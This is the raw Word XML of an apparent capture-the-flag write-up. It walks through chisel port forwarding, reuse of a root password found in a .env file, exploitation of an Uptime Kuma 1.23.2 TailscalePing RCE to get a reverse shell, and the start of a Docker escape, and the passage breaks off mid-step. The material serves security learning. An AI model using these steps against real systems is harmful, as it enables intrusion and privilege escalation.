          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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4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E">
      <w:pP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943600" cy="1358900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="90"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home directory of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">appuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we obtain the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">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943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -nlapt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we identify that port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3001</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running locally.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1701800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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 By executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 127.0.0.1:3001 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we confirm that it is a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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decide to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to forward port 3001 from the server’s localhost to our machine, allowing browser access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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our local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 9000 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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943600" cy="1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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the target server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel client &lt;IP-VPN&gt;:9000 R:3001:127.0.0.1:3001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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application in our browser, we encounter a login page requesting credentials. We can review previously accessed application files and attempt a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Reuse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86"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Reading the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</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file, we identify credentials that can be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:QSo7w1LIYJ85gnuzs, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we successfully log into the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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Accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/settings/about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we identify the Uptime Kuma version </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.23.2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pP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943600" cy="2832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="87"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researching this version, we identify a vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="240" w:befor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Authenticated Remote Code Execution via TailscalePing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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Important note: Since the application is running inside a container, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Tailscale Ping"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> type is hidden. However, we can intercept WebSocket messages and set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">isContainer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:br w:type="textWrapping"/>
          <w:t xml:space="preserve">https://github.com/louislam/uptime-kuma/security/advisories/GHSA-hfxh-rjv7-2369</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:spacing w:after="240" w:befor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click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Add New Monitor"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, intercept the request, and modify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">isContainer = false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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enables access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TailscalePing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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66900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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Afterward, we remove the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pattern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tag from the hostname field, which uses regex filtering, allowing us to insert our reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">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06700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="88"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reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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28800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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70"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clicking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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Since we are inside a container, we attempt a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker escape</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. One possible method is mounting the host filesystem inside the container (e.g., </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). This is only possible if the container was started with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged=true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to list partitions and disk usage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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3">
      <w:pPr>
        <w:spacing w:after="240" w:befor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4">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identifying the correct device, we mount it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr>
